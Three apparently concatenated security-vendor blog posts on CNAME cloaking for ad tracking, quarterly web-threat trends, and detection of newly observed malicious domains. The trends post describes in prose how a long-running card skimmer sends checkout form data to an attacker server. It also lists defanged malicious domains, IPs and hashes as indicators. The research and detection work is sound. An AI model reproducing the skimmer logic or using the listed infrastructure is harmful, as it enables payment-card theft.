In response to these concerns, developers of major browsers began introducing features to protect people against certain types of tracking. One of the major changes developers made was to change how browser cookies are handled, by blocking third-party cookies or placing limitations on how they are accessed.

How Does Cookie Blocking Work?

A cookie is essentially a token that a website gives a user, which their browser is expected to send in communications with that website.

The cookie provides convenient support for tracking, in that it ties the request to the user, and it also tells the website owner what the user is doing.

A first-party cookie is generated by the owner of the domain hosting the website a person is browsing. Third-party cookies belong to a domain a user is not currently visiting, and they are usually used for advertising.

To give an example: suppose a user, Alice, browses www[.]example[.]com. Bob owns the domain example[.]com and has configured his servers to send users cookies when they visit the website hosted at that domain. When Alice browses to other pages in example[.]com (e.g. chocolate_chip.example[.]com or www[.]example[.]com/gingersnap), the messages that she sends will include that cookie. Figure 1 illustrates these interactions.

The user pictured browses to www[.]example[.]com. An HTTP Get request is sent to the site's webservers, and the owner has configured them to send users cookies in response. In this example, the cookie "my_cookies" is set to the value "peanut_butter." When the user in this example browses to other pages on this domain, the messages that she sends will include the cookie "peanut_butter," allowing her movements on the site to be tracked.
Figure 1. The cookie my_cookie is set via the headers in the response from www[.]example[.]com.
Depending on the cookie’s attributes and Alice’s browser configuration, Alice’s requests to example[.]com will only include the cookie if Alice is already browsing example[.]com. For example, Alice’s browser will include the cookie in a request for example[.]com/oatmeal.png if Alice is browsing www[.]example[.]com, but not if she is visiting www[.]example[.]net. This limitation helps to protect Alice’s privacy by preventing Bob from seeing what other sites Alice visits.

As another step to help protect Alice’s privacy, her browser can block cookies set by any domain other than example[.]net while Alice is browsing example[.]net. To illustrate this, suppose an advertisement from ads[.]example[.]com appears on www[.]example[.]net. The owner of ads[.]example[.]com sends Alice’s browser a cookie when serving the advertisement, and this would be a third-party cookie (as shown in Figure 2). If Alice’s browser is set to block third party cookies, the cookie will not be returned to example[.]com in future requests.

The user pictured browses to www[.]example[.]com. An HTTP Get request is sent to the site's webservers, and the owner has configured them to send users cookies in response. In this example, the cookie "my_cookies" is set to the value "peanut_butter." When the user in this example browses to other pages on this domain, the messages that she sends will include the cookie "peanut_butter," allowing her movements on the site to be tracked.
Figure 2. The cookie from example[.]com is a third-party cookie, and it is blocked.

What Is CNAME Cloaking?

The prospect of the elimination of third-party cookies has caused some concern among advertisers and companies providing web-traffic analytics. These organizations often have their content embedded in other websites, and they rely on cookies being sent from those websites to collect information about their audience so they can tailor their campaigns accordingly.

With the elimination of third-party cookies, these entities will have less information with which to target their ads or perform their analysis. To address this limitation, some have turned to a practice known as canonical name (aka CNAME) cloaking.

A CNAME record is a type of DNS resource record (RR) that maps an alternate domain name to its true name. CNAME records are also useful for directing users to a single domain from multiple domain names.

If a DNS resolver sends a request for the IP address of a domain and receives a CNAME record, the resolver will then typically query for the IP address of the CNAME. Once the resolver has the IP address, it will return that IP address to the client that initiated the query.

When browsers initiate DNS queries for the domain names of websites, they often do not have visibility into these queries, and thus will not know that a domain has a CNAME record. The browser only sees the original name; the IP address to which that name ultimately resolves.

Figure 3 shows the basic outline of how CNAME cloaking works. A website owner, Bob, embeds content provided by a third party into the website at www[.]example[.]com. That content is served from ad[.]example[.]com, which is a subdomain of the domain used to host the website.

Bob also creates a CNAME record for ad[.]example[.]com that points to a subdomain belonging to the tracker x[.]example[.]net. When Alice browses to www[.]example[.]com and her browser sends a request to ad[.]example[.]com, that request appears to be going to the same domain used to host the website.

Alice’s browser will treat cookies sent in the response from ad[.]example[.]com as first-party cookies. This is how CNAME cloaking allows third parties to receive and set cookies, circumventing protections the browser might have against such activity.

CNAME cloaking does not support the same level of tracking as would be available if third-party cookies were allowed. The practice is nevertheless concerning because it hides information about where people’s data is sent, and it might create other problems such as leaking information to the third party or creating new vulnerabilities.

The user pictured browses to www[.]example[.]com. An ad embedded on the site is located at x[.]example[.]net, but because the website owner created a CNAME record that resolves to the IP address 1.2.3[.]4, this tracking activity is disguised.
Figure 3. CNAME cloaking allows tracking activity to be disguised.

Defenses

CNAME cloaking is not a new strategy, and a few defenses have already been deployed in this area. Some of these defenses come in the form of browser extensions that rely on blocklists. However, blocklists do not provide a scalable approach to CNAME cloaking detection, as the number of first-party subdomains that can be used to point to third parties is almost limitless.

UBlock Origin is one extension that takes a different approach to detecting CNAME cloaking based on DNS lookups. However, this defense only works in Firefox due to restrictions on access to DNS APIs.

Privacy Badger also takes a slightly different approach and looks for tracking behavior. Unfortunately, this browser plugin only works to block third parties, and because CNAME cloaking disguises third parties this plugin does not protect against this technique.

In contrast to browser-based defenses, a DNS-based approach allows communication to be blocked based on the domain name of the tracker, rather than that of the subdomain used for tracking. A few other groups, such as AdGuard and NextDNS have used this strategy for ad blocking.

This DNS-based approach is more scalable than most browser-based approaches, and it is the one Palo Alto Networks has taken. Using the insights provided by our passive DNS data, we can see the subdomains resolving to domains belonging to known trackers. This information forms the basis of our CNAME cloaking detector. These results provide people with insights into which advertising or marketing organizations are accessing their data via CNAME cloaking. Customers can also block the cloaked fully qualified domain names (FQDNs).

CNAME Cloaking Detections in Action

After running for a month, our CNAME cloaking detector identified almost 43,000 cloaked subdomains in over 38,000 root domains. The cloaked subdomains have CNAME records pointing to domains belonging to 32 organizations, which are largely focused on analysis for advertising or marketing purposes (see Figure 4). The lists created by Adguard and EasyPrivacy each cover less than 10% of the subdomains we detect.

Of the domains using CNAME cloaking, 98% have a cloaked subdomain pointing to only one third-party domain. Several hundred subdomains rely on two third-party domains, and a handful rely on three or four domains.

Similarly, over 92% of domains using CNAME cloaking have only a single cloaked FQDN, but several thousand have two or more, and a few have over ten. We have even observed some cases where entities will create a wildcard record pointing to the third-party domain.

 

This chart shows newly detected first party domains using a tracker CNAME. The X-axis has a date range from June 22, 2022 to July 5, 2022. The Y-axis is delineated in increments of 50, between zero and 200. The key identifies nine specific marketing and analytics companies, and one category marked "other".
Figure 4. Newly detected first-party domains per day, by tracker.

As noted above, CNAME cloaking is not an indication of inherently malicious activity. However, it does cause several problems: it undermines practices designed to protect people’s privacy, it decreases visibility into where their data goes, and it can create additional vulnerabilities. Examining a sample of slightly over 4,000 of the cloaked FQDNs identified by our detector provides insights into how cloaking is used.

Cloaking for Third-Party Cookies

As expected, many domains use CNAME cloaking to support sending cookies that were generated in the first-party context to a third-party service.

For example, 85% of the websites using CNAME cloaking with Adobe Experience Cloud sent requests to the cloaked FQDN that contained an AMCV cookie. As Adobe’s documentation explains, an AMCV cookie allows a website owner to track users across the website or across multiple domains belonging to that owner.

Slightly over a third of the websites using Adobe sent a s_ecid cookie, which supports “persistent ID tracking in the 1st-party state,” and it is “used as a reference ID if the AMCV cookie has expired.” This cookie is only usable for domains leveraging CNAME cloaking.

Other Adobe Experience Cloud cookies sent by many of the domains using the service include the AMCVS cookie (a session cookie used to determine if the session has been initialized), the s_cc cookie (used to determine if cookies are enabled), and the s_ppv cookie (used to measure scroll activity).

Requests to cloaked domains with CNAMEs pointing to Mapp’s wt-eu02[.]net include a variety of cookies supporting several functions such as; load balancing, determining whether a visitor is a newcomer or returning guest on a website, and tracking. In our sample, 76% of sites relying on Mapp used at least one of these cookies.

About 14% of domains using Salesforce sent visitor_id and visitor_id<accountid>-hash cookies to their cloaked subdomains.

Evading Defenses With Cookie Syncing

The Salesforce cookies provide an interesting example of one way trackers are handling protections introduced by browsers. Salesforce has developed an approach to deal specifically with Safari’s limitations on third-party cookies with Intelligent Tracking Prevention (ITP) 1.2.

Following this approach, Salesforce customers embed code in their websites to retrieve a script from pi.pardot[.]com that sets the visit_id and visit_id<acountid>hash cookies, and then it retrieves a script from the customer’s cloaked domain (as shown in Figure 5).

Script retrieved from pi.pardot[.]com.
Figure 5. Script retrieved from pi.pardot[.]com.
The script retrieved does nothing (as shown in Figure 6), but the HTTP response headers set the same two cookies (shown in Figure 7).

The script retrieved from the cloaked domain does nothing.
Figure 6. Script retrieved from cloaked domain.
The HTTP response headers set the visit_id and visit_id<acountid>hash cookies.
Figure 7. Headers in response return a script from a cloaked domain.

This process results in identical cookies but with different domains (shown in Figure 8), which is an example of cookie syncing.

The visit_id and visit_id<acountid>hash cookies for the tracker and cloaked domains are the same.
Figure 8. The same cookie is set on the tracker domain and the cloaked domain.

Cookie Leaks

One consequence of using CNAME cloaking is that other first party cookies might automatically be sent to the cloaked FQDN. Unexpectedly, the most common cookies seen in requests to cloaked domains were not those set by the tracker involved in the cloaking, but those associated with Google Analytics (see Table 1).

Cookie Websites sending cookie to cloaked domain Tracker domains receiving cookie
_ga 322 18
_gid 299 17
_gcl_au 191 14
GoogleAnalytics_gat 149 10
GoogleAnalytcs_ga 95 15
Adobe_AMCV 92 2
Adobe_AMCVS 91 2
s_cc 85 3
GoogleAnalytics_gtm 80 9
Act-On Beacon Cookie 75 2

Table 1. These cookies are those seen most commonly in requests. Rows in blue indicate Google Analytics Cookies.

Other cookies commonly seen in the requests sent to cloaked FQDNs include those belonging to Hotjar, Microsoft and Dynatrace. None of these services are on our list of parties supporting CNAME cloaking.

Conclusion

Many websites use CNAME cloaking to circumvent browser restrictions on third-party cookies. It is useful for those who want to leverage the services of third-party analytics, advertising or marketing organizations efficiently.

While cookies and the services provided by organizations that deal in tracked information can serve constructive purposes, CNAME cloaking raises serious security and privacy concerns. First and foremost, the practice decreases visibility into who is receiving users’ data, and it limits people’s ability to control what’s done with their information. Secondly, CNAME cloaking can lead to extra user information being sent to third parties due to cookie leaks. Finally, the use of CNAME cloaking could indicate a willingness to undermine other privacy protections, as we also see it in conjunction with other questionable practices such as cookie syncing.

Palo Alto Networks detects domains using CNAME cloaking and assigns them to the adtracking category through our cloud-delivered security services for Next-Generation Firewalls. These subscriptions include DNS Security and Advanced URL Filtering. Through this detector, we provide our customers visibility into and control over where their data is sent.

Additional Resources

 

Trends in Web Threats: Old Web Skimmer Still Active Today

Executive Summary

Palo Alto Networks Advanced URL Filtering subscription collects data regarding two types of URLs; landing URLs and host URLs. We define a malicious landing URL as one that provides an opportunity for a user to click a malicious link. A malicious host URL is a web page that contains a malicious code snippet that could abuse someone’s computing power, steal sensitive information or perform other types of attacks.

Between January 2022 and March 2022, Palo Alto Networks detected over 577,000 instances of landing URLs, of which 20% were unique URLs. We also detected over two million host URLs, of which about 9% were unique URLs. This analysis was done using our web threat detection modules, which is used in our cloud-delivered security services such as Advanced URL Filtering.

In this blog, we present our analysis and findings around the latest trends of web threats like host and landing URLs including; where they are hosted, what categories they belong to, and which malware families are more likely to pose a threat. We also take a look at other threats such as skimmer attacks, downloaders and cryptominers.

With the help of Palo Alto Networks Advanced URL Filtering and Threat Prevention cloud-delivered security services, customers are protected from the threats discussed in this blog. Our web protection engine, Advanced URL Filtering, helps detect malicious URLs such as landing and host URLs. Our intrusion prevention system, Advanced Threat Prevention, applies added protection and helps prevent web threats like cryptomining and JavaScript downloading.

Types of Attacks and Vulnerabilities Covered Skimmer attacks, malware, cryptominers
Related Unit 42 Topics Information stealing, A Closer Look at the Web Skimmer , The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More

Web Threats Landing URLs: Detection Analysis

Palo Alto Networks crawls and analyzes millions of URLs from different sources every day, including newly seen URLs in customer traffic and email links. We collected web threat related data from customers with our Advanced URL Filtering subscription, using special YARA signatures.

Between January 2022 and March 2022, we detected 577,275 incidents involving landing URLs containing all kinds of web threats, 116,643 of which were unique URLs. We discovered, when compared to the previous quarter, the total number of incidents involving landing URLs increased while the number of unique URLs decreased.

Web Threats Landing URLs Detection: Time Analysis

As shown in Figure 1 and also mentioned in our blog, “Web Threats: Malicious Host URLs, Landing URLs and Trends”, we saw an increase in landing URLs in November 2021, and then began to see this number decline beginning in January through March 2022.

Bar chart showing web threat trends. January-March 2022 on the X-axis, and 0-250,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. January 2022 = 216,621 total hits: 46,534 unique hits. February 2022 = 212,643 total hits: 31,825 unique hits. March 2022 = 148,011 total hits: 38,284 unique hits.
Figure 1. Web threats landing URLs distribution January-March 2022. (Blue bars indicate all detections, including repeated detections of the same URL, and red bars indicate detection of unique URLs).

Web Threats Landing URLs: Geolocation Analysis

According to our analysis, the previously mentioned 116,643 malicious unique landing URLs came from 22,279 unique domains. After identifying the geographical locations of these domains, we found that the majority of them seem to originate from the United States, followed by Germany and Russia, which was also the case in the previous quarter. However, we recognized that attackers are leveraging proxy servers and VPNs located in those countries to hide their actual physical locations.

The choropleth map shown in Figure 2 shows the wide distribution of these domains across almost every continent, including Africa and Australia. Figure 3 shows the top eight countries where the owners of these domain names appeared to be located.

Choropleth map showing the geolocation distribution of landing URLs from January-March 2022
Figure 2. Web threats landing URLs’ domain geolocation distribution January-March 2022.
Pie chart showing distribution of originating country of landing URLs from January-March 2022. United States - 62.2%, Germany - 3.9%, Russia - 3.0%, France - 1.6%, United Kingdom, Brazil, Netherlands - 1.3%, Canada - 1.1%, Others - 24.3%
Figure 3. Top eight countries where web threat landing URLs’ domains originated from, between January 2022 and March 2022.

Web Threats Landing URLs: Category Analysis

We analyzed landing URLs that were originally identified by our detection module as benign, to find common targets for cyberattackers, and where they might be trying to fool users. These landing URLs can potentially lead to people clicking on a malicious host URL. Going forward, all these landing URLs that lead to malicious code snippets will be marked as malicious by our Advanced URL FIltering service.

As shown in Figure 4, the top apparently benign targets are business and economy sites, followed by personal sites and blogs, and then shopping sites. Compared to last quarter, the top two categories flipped. Because attackers often try to trick users into clicking malicious links from seemingly benign sites, we strongly recommend that users exercise caution when visiting an unfamiliar website.

Pie chart showing the top 10 categories hosting web threats from January-March 2022. Business and economy sites - 14.9%, personal sites and blogs - 9.1%, shopping - 7.8%, computer and internet - 7.5%, health and medicine - 5.5%, society - 4.8%, entertainment - 4.3%, web hosting - 3.6%, travel - 3.3%, parked - 2.9%, Others - 36.3%
Figure 4. We divided landing URLs that originally appeared benign into categories. Here are the top 10 categories that hosted web threats January-March 2022.

Web Threats Malicious Host URLs: Detection Analysis

With Advanced URL Filtering, we detected 2,043,862 incidents of malicious host URLs from January 2022 to March 2022, of which 180,370 were unique URLs. In the following section, we will take a closer look at those malicious host URLs. (“Malicious host URLs” specifically refers to pages that contain a malicious snippet that could abuse users' computing power, steal sensitive information and so on).

Web Threats Malicious Host URLs Detection: Time Analysis

As seen in our analysis of landing URLs, and also mentioned in our previous blog, “Web Threats: Malicious Host URLs, Landing URLs and Trends”, we discovered web threats were more active in November 2021 and slowly declined, beginning in January through March 2022.

Bar chart showing January-March 2022 on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. January 2022 = 841,284 total hits: 77,460 unique hits. February 2022 = 688,020 total hits: 50,996 unique hits. March 2022 = 514,558 total hits: 51,914 unique hits.
Figure 5. Web threats malicious host URLs distribution January-March 2022.

Web Threats Malicious Host URLs Detection: Geolocation Analysis

In our geolocation analysis of host URLs, we discovered that the 180,370 unique malicious host URLs belonged to 17,660 unique domains – fewer unique domains than we observed for landing URLs. This suggests attackers target different entry points but often use fewer domains to host the malicious code. The total number of unique malicious host URLs was otherwise higher than unique landing URLs, which suggests that attackers are deploying more malicious code when they can leverage a single entry point.

After identifying the apparent geographical locations of these domains, we found that the majority of them also seem to originate from the United States – as we observed for web threats generally. Figure 6 below shows the heat map.

Choropleth map showing the geolocation distribution of malicious host URLs from January-March 2022
Figure 6. Web threats malicious host URLs’ domain geolocation distribution January-March 2022.

Figure 7 shows the top eight countries where the owners of these domain names appeared to be located.

Pie chart showing distribution of originating country of malicious host URLs from January-March 2022. United States - 66.0%, Germany - 4.2%, Russia - 3.4%, France - 1.6%, Brazil - 1.5%, Netherlands - 1.3%, United Kingdom - 1.2%, Italy 1.1%, Others - 19.7%
Figure 7. Top eight countries where web threats malicious host URLs’ domains appeared to be located January-March 2022.

Web Threats Malware Class Analysis

The top five web threats we observed are cryptominers, JavaScript (JS) downloaders, web skimmers, web scams and JS redirectors. Please refer to our previous analysis for the definition of these classes: “The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More”.

As shown in Figure 8, JS downloader threats showed the most activity at the start of 2022, followed by web miners (aka cryptominers) and web skimmers which was similar to the previous quarter.

Bar chart showing js_downloader, web_miner, web_skimmer, js_redirector and web_scam on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. Js_downloader = 889,106 total hits: 70,081 unique hits. Web_miner = 463,611 total hits: 25,917 unique hits. Web_skimmer = 351,660 total hits: 29,728 unique hits. Js_redirector = 192,096 total hits: 4,990 unique hits. Web_scam = 80,158 total hits: 12,401 unique hits.
Figure 8. Top five web threats category distribution January-March 2022.

Web Threats Malware Family Analysis

Based on our classification of web threats explained in the previous section, we further categorized them by malware family. The family is important to understanding how threats work since threats in the same family share similar JS code, even if the HTML landing pages where they appear have different layouts and styles.

As we did in our yearly analysis, The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More, we identified pieces of malware as part of a family by checking for certain characteristics: similar code patterns or behaviors, or indications of having originated from the same attacker.

Figure 9 shows the number of snippets observed from the top 18 malware families we identified. As we’ve seen previously, there were fewer families of cryptominers and JS downloaders, while web skimmers showed more diversity in code and behavior.

Bar chart showing the web threat families along the X-axis, and 0-200,000 on the Y-axis. Key indicates that blue bars are total hits, and red bars are unique hits. There are 3 Coinhive families, 8 skimmer families, 4 downloader families, 1 redirector family, and 2 web scam families represented.
Figure 9. Web threats malware family distribution January-March 2022.

Web Threats Case Study

Among all of the web threats we detected during this analysis, the most notable was a web skimmer that we identified, which has been active for the last five years.

As shown in Figure 10, the source code of this web skimmer was injected into the target web page with a lightly obfuscated JS code.

Lightly obfuscated JS source code injected into the target web page
Figure 10. Source code of a web skimmer that has been active for at least five years.

After deobfuscating and clarifying the JS code as shown in Figure 11, we can extract the collection server of the web skimmer: cloudfusion[.]me. This web skimmer is simple, yet classic.

It checks whether the current URL is the payment page by comparing the window.location.href property with the strings onepage or checkout. If a match is found, the code collects the inputs from the input and select elements (as well as other sensitive information from customers) when the button is clicked.

The code then sends that information to the remote collection server, https://cloudfusion[.]me/cdn/jquery.min.js, which is controlled by the attacker.

Deobfuscated source code showing the address of the remote collection server
Figure 11. Deobfuscated source code of the web skimmer that has been active at least five years.

As early as 2017, researchers reported that this web skimmer pretended to be a part of the JQuery library. From our detection data, we found that this web skimmer is still very active in 2022.

There are 27,917 URLs from 14 different websites that the attacker injected with this web skimmer family. Based on our telemetry, this threat is one of the most active web skimmers in recent history.

There is a malicious JavaScript file named jquery.min.js, which is hosted on the server controlled by the attacker. It is responsible for receiving sensitive information sent by the web skimmer. By searching for the SHA value of jquery.min.js as shown in Figure 12, we can see it was once hosted on different IP addresses that were located in Germany and Russia.

Virus Total relations tab results for jquery.min.js showing different in-the-wild IP addresses in Germany and Russia
Figure 12. Relations about jquery.min.js

Since March 13, 2020, cloudfusion[.]me has started pointing to the following IP addresses:

  • 198.54.117[.]197
  • 198.54.117[.]198
  • 198.54.117[.]199
  • 198.54.117[.]200

These IP addresses are actively involved in other malware campaigns, such as the following Trojan (SHA256: 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f). They connect to these IPs through the domain voques-tfr[.]xyz.

Although this domain is not resolvable anymore, we analyzed the malware traffic based on another similar request to the URL www.misuperblog[.]com/tmz/?sRjPP6ZH=21Ru2Nt5y6IynFa8dNKfckGmLKuTraB2ebSZxsJ3CJwKQtaV8aXvWfS0YurLHqXx0CGvRSPYnS9vGtnwfQCtQg==&EZ442V=IbnToV6xqdfx. We found that this URL loads obfuscated JS that triggers several redirects to an adult website (yhys93[.]site).

Conclusion

As we highlighted in this blog, this quarter’s most prevalent web threats were cryptominers, JS downloaders, web skimmers, web scams and JS redirectors. Of the landing URLs we analyzed, the top three industry verticals targeted by attackers were business and economy sites, personal sites and blogs, and shopping sites.

Furthermore, we found an old web skimmer is still active after five years. This shows that old threats can remain popular for long periods of time, and that it is critical for users to exercise caution when visiting unfamiliar sites.

While cybercriminals continue to seek opportunities for malicious cyber activities, Palo Alto Networks customers benefit from protection against web threats discussed in this blog and many others, via our Advanced URL Filtering and Advanced Threat Prevention cloud-delivered security subscriptions.

We also recommend the following actions:

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Malicious Web Skimmer SHA256:

79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220
992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f

Acknowledgements

We would like to thank Billy Melicher, Alex Starov, Jun Javier Wang, Mitchell Bezzina, Ashraf Aziz and Jen Miller Osborn for their help with the blog.

Detecting Emerging Network Threats From Newly Observed Domains

Executive Summary

In May 2021, Palo Alto Networks launched a proactive detector employing state-of-the-art methods to recognize malicious domains at the time of registration, with the aim of identifying them before they are able to engage in harmful activities. The system scans newly registered domains (NRDs) and detects potential network abuses. However, the proactive detector has limitations; created to only focus on new domains, it cannot obtain and analyze malicious indicators appearing after a domain's creation. In addition, in the cases of adversaries leveraging or compromising aged domains to carry out attack traffic, the proactive detector fails to capture the emerging threats because the malicious domains are out of the scope of being considered NRDs.

In addition to scanning for potential abuses at the time of registration, we have another great opportunity to detect malicious domains proactively when they start carrying attack traffic. A malicious domain may be registered long before it serves its attacking campaign and exposes indicators of abuse. Once the domain starts carrying malicious traffic, we can observe its DNS requests from passive DNS. To block network threats at this early stage, we developed a new proactive detector that ingests newly observed domains (NODs) to discover potential threats among them. The new detector leverages various machine learning techniques to expose suspicious behaviors based on various information about NODs, including their latest WHOIS records and DNS traffic.

This blog will illustrate how we collect and analyze the enriched features available for NODs to detect emerging threats. Our detector scans 2.6 million NODs and captures around 2,300 suspicious domains every day. To evaluate the performance, we cross-checked the detected domains against other threat intelligence from VirusTotal. 33.08% of the NODs detected by our system were also labeled as malicious by other sources later. But our detector's average discovery time is 4.79 days earlier than any VirusTotal vendor. Furthermore, we will explain the new system's benefits with case studies about various network abuses such as command and control (C2), phishing and unethical search engine optimization (SEO) practices. We will discuss how the proactive detector captured and blocked these threats based on different indicators for cybercriminal activities.

Once the proactive detector captures a potentially harmful domain, the knowledge is distributed from DNS Security to other Palo Alto Networks Cloud-Delivered Security Services, including URL Filtering and WildFire.

Related Unit 42 Topics DNS Security

Detection Methods and High-level Statistics

Palo Alto Networks collects passive DNS data from multiple sources, including our DNS Security service, as well as external providers from all around the world. Our cloud-based passive DNS system can ingest and process about 13 million DNS logs each day. The data ingestion pipeline catches the latest DNS data every hour and extracts the domains that haven't been seen carrying traffic before. These domains will be forwarded to the proactive detector to identify emerging threats. Our system can capture and scan about 2.6 million NODs daily.

Number of newly observed domains shown in blue bars. Detection percentage shown in red line. Period covered is April 27, 2022-May 23, 2022
Figure 1. Daily NOD amount and the percentage flagged as suspicious.

For each NOD, our centralized data collector will actively crawl all related information, including the latest WHOIS record and all DNS traffic requesting the domain and its subdomains. To leverage a variety of malicious indicators, we developed individual machine learning models to analyze different information. Specifically, we built a reputation system to evaluate WHOIS records, applied multiple classification models to DNS-related features, and used the bigram model to analyze hostnames. These models captured about 2,323 unique potentially malicious NODs every day. Figure 1 shows the daily NOD amount and detection rate from April 27-May 2, 2022.

Number of days between when a domain is considered a newly registered domain (NRD) and when it is considered a newly observed domain (NOD). The graph shows the cumulative distribution function of their dormant periods.
Figure 2. Malicious NOD Dormant Period CDF.

To analyze attackers' behaviors, we compare the registration date of potentially malicious NODs and the date when they start hosting DNS traffic to see how long they keep silent before activation. Figure 2 presents the cumulative distribution function (CDF) of their dormant periods. The malicious domains start carrying traffic 5.57 days after their registration on average. However, during the period studied, our detector captured 152 NODs involving network abuses more than one year after creation – some domains can lie dormant for a significant amount of time before beginning malicious activity.

The cumulative distribution function of how many days before any vendor of VirusTotal the proactive detector was able to flag malicious domains among newly observed domains.
Figure 3. Early discovery time CDF.

Of all suspicious NODs detected by the new proactive system, 37.11% were labeled as confirmed malicious 30 days later by Palo Alto Networks or other threat intelligence vendors in VirusTotal. Figure 3 shows the CDF of how many days before any vendor on VirusTotal the proactive detector was able to flag malicious domains. On average, our detector can capture these malicious domains and isolate their traffic 4.79 days before any VirusTotal vendor blocks them. Furthermore, we can discover 19.47% of malicious NODs more than a week earlier than others.

Broader Visibility Into Emerging Internet Threats

One major benefit of our new proactive malicious NOD detector is that it extends visibility into emerging attacking domains. The previous proactive detector scans threats among NRDs only. However, not all top-level domains (TLDs) disclose their new domains to the public. For example, hundreds of country-level TLDs are maintained by governments. Access to their complete domain list or WHOIS database is restricted.

Let's take a malicious domain within the .ga TLD, for instance. Our proactive detector captured and labeled the NOD payment-downlaods[.]ga as grayware on March 4. .ga is the country code TLD for Gabon. This TLD offers free domain registration, but its domains’ creation dates are not available in the WHOIS records. Therefore, we cannot directly confirm .ga NRDs based on the registration information. Monitoring passive DNS data is the primary way to detect recently active .ga domains. We caught payment-downlaods[.]ga carrying C2 traffic 12 days after we first observed its DNS traffic. The domain served Android Package Kit (APK) spyware that attempted to steal private information including SMS messages (SHA256: e9ad04ae0201307e061cdae350c392a6b4537876991b2c97857ea71086fa0496).

Besides textual characteristics, the WHOIS record is another important feature that can be used for proactive malicious domain detection. It can expose various network abuse warning signs such as registrants, registrars and name servers. Our malicious NOD detector will actively crawl new domains’ WHOIS records for analysis once we observe their DNS traffic.

For example, our detector blocked a phishing domain within the .ml TLD as soon as we observed it in passive DNS data on May 10. The centralized WHOIS database for .ml is not publicly available, so the detectors focusing on NRDs failed to inspect this domain. However, once it began to carry traffic, the proactive malicious NOD detector crawled its WHOIS record and found the name server is offshoreracks[.]com, which provides an offshore and anonymous hosting service. Besides this questionable name server, the NOD's registrar also has a bad reputation. The NOD is a squatting domain mimicking a major international banking group based in Italy. The phishing website copied the text from the official site but with fake contact information. Interestingly, despite mimicking an Italian bank, the website uses Turkish, so it's likely intended to target Turkish victims.

Capture More Malicious Indicators

Unlike the WHOIS record that is available once a domain is created, some indicators for cybercriminal activities will only be exposed after a malicious domain starts carrying attacking traffic. Therefore, our detector also analyzes the DNS traffic of NODs to capture any suspicious behaviors.

Example of a scam page hosted on a DGA subdomain that asks for notification permissions. The presence of a large number of subdomains produced by DGAs can be an indicator that a newly observed domain is suspicious.
Figure 4. Black hat SEO page hosted on DGA subdomain of twtyowq[.]tk.
One of the abnormal DNS traffic patterns that is highly related to network threats is the presence of a large number of subdomains produced by domain generation algorithms (DGAs). Attackers could use these subdomains to exfiltrate stolen information or perform black hat search engine optimization (SEO) with wildcard DNS. Our proactive detector leverages this indicator to identify potentially abused NODs.

Let's take a pop-up advertising campaign that we detected as an example. This campaign was distributed through .tk domains such as twtyowq[.]tk, bsdybwo[.]tk and bwafduj[.]tk. The creation time of .tk domains is unavailable so we cannot obtain any NRDs under this zone. However, when we first saw these domains' DNS traffic, each of them had hundreds of DGA subdomains hosting scam pages asking for notification permission and redirecting visitors to unwanted ads (see Figure 4).

Traffic from gateway domains such as jxc786[.]com will reach this gambling website, but if a visitor opens the subdomain directly, they are redirected to a search engine for cloaking.
Figure 5. Gambling website hosted on jxc786[.]com.
Besides explicit DGA subdomains, our detector digs deeper into NODs' DNS logs to expose DGA traffic hidden behind them. For example, the domain jxc786[.]com was registered on April 23, but we didn't see any evidence of cybercriminal activity at that time. However, it started pointing to b136jishiang01hy.bakbitionb[.]com on May 22. bakbitionb[.]com is the infrastructure domain for a gambling campaign. In passive DNS, this domain has hundreds of DGA subdomains associated with different gateway domains through CNAME records. If visitors directly open these DGA subdomains in their browsers, they will be redirected to baidu[.]com for cloaking. However, traffic from gateway domains such as jxc786[.]com will reach the gambling website shown in Figure 5.

A phishing page hosted on a subdomain as part of an attempt to use levelsquatting to impersonate Apple.
Figure 6. Fake iCloud account recovery page hosted on asuna-sao[.]us.
The proactive detector can also discover and block levelsquatting subdomains from NODs’ passive DNS records. The levelsquatting technique includes a legitimate website’s domain as a subdomain in order to trick visitors into thinking they have arrived at the legitimate website. It is commonly used in conjunction with phishing attacks.

For example, our system recognized multiple subdomains of asuna-sao[.]us as levelsquatting hostnames masquerading as Apple Inc and labeled the domain as dangerous. The domain was registered on April 12 and started receiving traffic for subdomains like www.flnd-appleld.asuna-sao[.]us, www.lcloud-supoort.asuna-sao[.]us and www.apple-flnd.asuna-sao[.]us on the same day. These hostnames all deliver the same phishing page, which tries to steal Apple ID credentials (Figure 6).

Capture Aged Malicious Domains

In previous writing on strategically aged domains, we reported that some had been registered years before they were actively involved in cybercriminal campaigns. These domains didn't reveal any indicator for network abuses when they were created. Monitoring NODs gives us a second chance to capture aged malicious domains.

A rogue advertising page hosted shortly after the domain's WHOIS record was updated, illustrating how it can be important to check newly observed domains for malicious indicators even if they were benign at the time of registration.
Figure 7. Advertisement page hosted on createruler[.]com.
When crawling NODs' WHOIS records, we discover that many aged domains have recent WHOIS record changes before they are involved in network abuses. For example, createruler[.]com was registered in May 2022. Its WHOIS was updated on June 3, 2022. Then the domain started hosting a rogue advertising page, as shown in Figure 7. Our proactive detector analyzed its latest WHOIS record and classified it as suspicious based on its use of a highly abused name server. The name server is a parking service provider that monetizes domains' traffic through advertisement networks. This kind of parking site could expose visitors to various threats, such as malware distribution, potentially unwanted program (PUP) distribution and phishing scams.

The proactive detector also captured some domains repeatedly leveraged by network threats. For example, we captured a squatting domain mimicking a major digital payment network based in the United States. It used to serve a phishing campaign in 2020 and expired in 2021. But the adversary registered it again on March 13, 2022. Our detector observed it started carrying traffic and recognized it as a potentially malicious NOD on Sept. 2, 2022. The domain hosts a rogue website that tags the legitimate target domain on the index page and tries to collect the visitor's contact information. This website is highly suspicious and likely to be engaged in network fraud.

Conclusion

